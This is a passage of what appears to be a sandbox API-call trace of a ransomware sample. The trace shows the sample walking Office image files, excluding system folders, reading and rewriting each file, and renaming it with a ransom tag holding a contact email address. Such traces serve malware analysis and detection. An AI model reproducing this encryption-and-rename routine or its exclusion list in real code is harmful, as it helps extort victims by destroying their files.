lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.546] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2288) returned 1 [0134.546] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.546] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0134.549] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.550] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0134.550] CloseHandle (hObject=0x238) returned 1 [0134.550] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.551] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0d373e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0d373e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x681, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.contrast-white_scale-80.png", cAlternateFileName="WI62EF~1.PNG")) returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned 1 [0134.552] lstrcmpiW (lpString1="WinWordLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0134.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0134.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d0d8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0134.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0134.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d260, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0134.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.553] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1665) returned 1 [0134.553] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.553] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x680, lpOverlapped=0x0) returned 1 [0134.555] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.555] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x680, lpOverlapped=0x0) returned 1 [0134.555] CloseHandle (hObject=0x238) returned 1 [0134.555] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.556] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8c7801, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8c7801, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8edb08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.scale-100.png", cAlternateFileName="WI3A30~1.PNG")) returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2=".") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="..") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="...") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="windows") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="recovery") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="perflogs") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="system volume information") returned 1 [0134.556] lstrcmpiW (lpString1="WinWordLogoSmall.scale-100.png", lpString2="msocache") returned 1 [0134.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 30 [0134.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x240f20, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 30 [0134.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.557] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1948) returned 1 [0134.557] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.557] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x790, lpOverlapped=0x0) returned 1 [0134.561] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.561] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x790, lpOverlapped=0x0) returned 1 [0134.561] CloseHandle (hObject=0x238) returned 1 [0134.561] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.562] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b27715c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b27715c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b29d36d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x892, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.scale-140.png", cAlternateFileName="WI93F0~1.PNG")) returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2=".") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="..") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="...") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="windows") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="recovery") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="perflogs") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="system volume information") returned 1 [0134.562] lstrcmpiW (lpString1="WinWordLogoSmall.scale-140.png", lpString2="msocache") returned 1 [0134.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x241178, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 30 [0134.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 30 [0134.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.563] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2194) returned 1 [0134.563] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.563] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x890, lpOverlapped=0x0) returned 1 [0134.579] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.579] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x890, lpOverlapped=0x0) returned 1 [0134.579] CloseHandle (hObject=0x238) returned 1 [0134.579] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.580] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b145e25, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b145e25, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b145e25, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x938, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.scale-180.png", cAlternateFileName="WIE085~1.PNG")) returned 1 [0134.580] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2=".") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="..") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="...") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="windows") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="recovery") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="perflogs") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="system volume information") returned 1 [0134.581] lstrcmpiW (lpString1="WinWordLogoSmall.scale-180.png", lpString2="msocache") returned 1 [0134.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x241380, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 30 [0134.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 30 [0134.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.582] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2360) returned 1 [0134.582] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.582] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x930, lpOverlapped=0x0) returned 1 [0134.583] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.584] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x930, lpOverlapped=0x0) returned 1 [0134.584] CloseHandle (hObject=0x238) returned 1 [0134.584] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.585] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8edb08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8edb08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a913cc8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogoSmall.scale-80.png", cAlternateFileName="WIB162~1.PNG")) returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2=".") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="..") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="...") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="windows") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="recovery") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="perflogs") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="system volume information") returned 1 [0134.585] lstrcmpiW (lpString1="WinWordLogoSmall.scale-80.png", lpString2="msocache") returned 1 [0134.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0134.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x241010, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 29 [0134.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0134.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 29 [0134.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 